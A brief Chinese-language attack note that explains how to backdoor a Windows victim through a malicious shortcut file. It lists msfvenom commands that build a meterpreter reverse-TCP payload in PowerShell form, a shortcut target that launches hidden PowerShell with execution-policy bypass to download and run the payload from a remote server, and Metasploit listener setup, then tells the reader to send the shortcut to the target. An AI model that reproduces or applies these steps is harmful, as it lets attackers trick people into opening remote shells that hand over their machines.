快捷方式powershell反弹到msf

系统自定义

生成一个msf后门

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 -f psh-reflection > psl.psl

 

在windows下创建一个快捷方式:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://xxx.com/psl.psl');"

 

or

msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=4444 LHOST=xxx.xxx.xxx.xxx -f psh-cmd

 

开启msf监听,然后把快捷方式丢给目标

use exploit/multi/hander

set PAYLOAD windows/x64/meterpreter/reverse_tcp

….

 

chcp 65001